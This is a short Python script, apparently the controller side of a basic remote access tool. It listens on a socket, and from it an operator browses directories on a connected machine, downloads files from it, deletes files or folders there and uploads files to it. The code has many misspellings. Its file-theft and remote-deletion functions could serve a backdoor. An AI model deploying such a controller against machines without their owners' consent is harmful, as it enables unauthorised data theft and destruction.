import os
import socket
s = socket.socket()
host = socket.gethostname()
port = 8080
s.bind((host, port))
print("")
print("surver is curently runing 0 ", host)
print("waiting for incoming conections...")
s.listen(1)
conn, addr = s.accept()
print(addr,"Has connected to the server sucesfully" )
while 1:
    command = input("command >> ")
    if command == "view_cwd":
        conn.send(command.encode())
        print("")
        print("command sent wating for execution...")
        print("")
        print("command has been sent suucesfully...")
        files = conn.recv(5000) 
        files = files.decode()
        print("command output : ", files)
    elif command == "cust_dir":
        conn.send(command.encode())
        user_input = input("custome dir : ")
        conn.send(user_input.encode())
        print("Command has been sent...")
        print("")
        files = conn.recv(5000)
        files = files.decode()
        print("Coustome dir result : ", files)
    elif command == "download":
        conn.send(command.encode())
        user_input = input("download derictory : ")
        conn.send(user_input.encode())
        filepath = input("Enter the derictory including path and name : ")
        conn.send(filepath.encode())
        file = conn.recv(10000)
        file_name = input("Enter the file name includes extention :  ")
        new_file = open(file_name, "wb")
        new_file.write(file)
        new_file.close()
        print(file_name, "has been downloaded and saved succesfully")
        print("")
    elif command == "removedir":
        conn.send(command.encode())
        fileanddir = input("Enter the path with the extention of file : ")
        conn.send(fileanddir.encode())
        print("")
        print("Executed succesfully : File or folder removed")
    elif command == "sendfile":
        conn.send(command.encode())
        file = input("Enter the file name and derictory : ")
        filename = input("Enter the file name for the file to bring sent with received : ")
        data = open(file, "rb")
        file_data = data.read(10000)
        conn.send(filename.encode())
        print("")
        print(file,"has been sent successfully")
        conn.send(filename.encode())
        conn.send(file_data)
    elif command == "cmd":
        print("Avalabele commands : removedir, download, cust_dir, view_cwd")
    else:
        print("")
        print("command not recogniced")